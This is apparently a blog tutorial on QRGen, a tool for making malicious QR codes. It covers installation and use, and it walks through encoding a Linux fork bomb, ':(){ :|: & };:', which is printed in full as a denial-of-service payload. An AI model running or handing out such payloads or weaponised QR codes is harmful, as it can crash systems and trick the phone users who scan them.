QRGen : Hacking QR Codes



Note : This tutorial/article is only for educational purpose. Learn the process, and aware your circle about it. Keeping security in mind, only test it in your own network and device.

Github

Without scanning QR Code, we cannot read information available in QR Code. So, malicious QR Code can harm our devices, can collect our information, or say it other way "can hack".

The security issue in QR Code reader/scanner available in your smartphone can be exploited to trick smartphone users into visiting malicious sites.

QRGen is used to create malicious QR Codes. QRGen can encode custom made payloads too.

Installation :
What to you need: python3, qrcode, Pillow, argparse

Steps
git clone https://github.com/h0nus/QRGen
cd QRGen
pip3 install -r requirements.txt OR python3 -m pip install -r requirements.txt
python3 qrgen.py
Run it :
python3 qrgen.py
Creating a payload from list.
python3 qrgen.py -l 5 
Payloads will be created.
To see other payloads created, change directory
cd genqr
ls
Let's encode custom payload now.
Create a text file first.
touch forkb.txt
Write fork bomb payload inside that text fileFork Bomb is a program which harms a system by making it run out of memory. It forks processes infinitely to fill memory. The fork bomb is a form of denial-of-service (DoS) attack against a Linux based system.
:(){ :|: & };:
Now let's get back to QRGen directory. (cd ..)
And write Payload to QR Code. 
python3 qrgen.py -w '/username/QRGen/genqr/forkb.txt'
Payload path exist, continuing... 
Path already cleared or deleted.. 
Generated 1 payloads! 
Opening last generated payload... 
Thanks for using QRGen, made by H0nus..
Generated QR Code will be opened.
Thank You.
Resources to learn more about QRGen :
https://github.com/h0nus/QRGen
https://null-byte.wonderhowto.com/how-to/create-malicious-qr-codes-hack-phones-other-scanners-0197416/
https://www.cultofmac.com/537319/ios-11s-qr-code-reader-can-trick-you-into-visiting-malicious-sites/
AD :


Comments